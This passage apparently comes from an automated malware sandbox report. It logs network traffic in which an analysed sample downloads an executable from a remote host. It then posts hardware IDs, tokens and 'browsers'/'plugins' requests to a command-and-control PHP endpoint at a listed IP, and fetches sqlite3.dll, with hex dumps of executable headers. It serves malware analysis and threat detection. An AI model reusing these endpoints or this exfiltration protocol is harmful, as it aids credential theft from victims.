00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /karu/l2.exe HTTP/1.1Host: aldiablo.clCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 193.176.190.41Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKFHost: 193.176.190.41Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 39 38 38 34 44 43 35 34 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKKFBAEGDHJJJJKFBKFContent-Disposition: form-data; name="hwid"769884DC54231817704571------FBKKFBAEGDHJJJJKFBKFContent-Disposition: form-data; name="build"cry------FBKKFBAEGDHJJJJKFBKF--
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 193.176.190.41Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 37 64 31 32 39 32 36 37 30 31 65 62 66 66 34 62 63 31 65 38 65 39 39 36 64 35 61 39 32 31 37 34 36 61 32 39 39 64 39 34 65 35 66 33 33 39 36 33 61 32 61 61 36 33 39 38 33 62 36 66 65 64 66 34 39 35 63 39 33 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"137d12926701ebff4bc1e8e996d5a921746a299d94e5f33963a2aa63983b6fedf495c933------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"browsers------DBKEHDGDGHCBGCAKFIII--
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 193.176.190.41Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 37 64 31 32 39 32 36 37 30 31 65 62 66 66 34 62 63 31 65 38 65 39 39 36 64 35 61 39 32 31 37 34 36 61 32 39 39 64 39 34 65 35 66 33 33 39 36 33 61 32 61 61 36 33 39 38 33 62 36 66 65 64 66 34 39 35 63 39 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"137d12926701ebff4bc1e8e996d5a921746a299d94e5f33963a2aa63983b6fedf495c933------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="message"plugins------AKKKECBKKECGCAAAEHJK--
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 193.176.190.41Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 37 64 31 32 39 32 36 37 30 31 65 62 66 66 34 62 63 31 65 38 65 39 39 36 64 35 61 39 32 31 37 34 36 61 32 39 39 64 39 34 65 35 66 33 33 39 36 33 61 32 61 61 36 33 39 38 33 62 36 66 65 64 66 34 39 35 63 39 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 2d 2d 0d 0a Data Ascii: ------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="token"137d12926701ebff4bc1e8e996d5a921746a299d94e5f33963a2aa63983b6fedf495c933------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="message"fplugins------FHIJJJKKJJDAKEBFIJDH--
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 193.176.190.41Content-Length: 7267Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /9e7fbd3f0393ef32/sqlite3.dll HTTP/1.1Host: 193.176.190.41Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 193.176.190.41Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJEHost: 193.176.190.41Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIJECAEGDHIDHJKKKKFHost: 193.176.190.41Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 37 64 31 32 39 32 36 37 30 31 65 62 66 66 34 62 63 31 65 38 65 39 39 36 64 35 61 39 32 31 37 34 36 61 32 39 39 64 39 34 65 35 66 33 33 39 36 33 61 32 61 61 36 33 39 38 33 62 36 66 65 64 66 34 39 35 63 39 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="token"137d12926701ebff4bc1e8e996d5a921746a299d94e5f33963a2aa63983b6fedf495c933------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file"------IIIJECAEGDHIDHJKKKKF--
Source: global traffic HTTP traffic detected: POST /2fa883eebd632382.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 193.176.190.41Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 37 64 31 32 39 32 36 37 30 31 65 62 66 66 34 62 63 31 65 38 65 39 39 36 64 35 61 39 32 31 37 34 36 61 32 39 39 64 39 34 65 35 66 33 33 39 36 33 61 32 61 61 36 33 39 38 33 62 36 66 65 64 66 34 39 35 63 39 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; 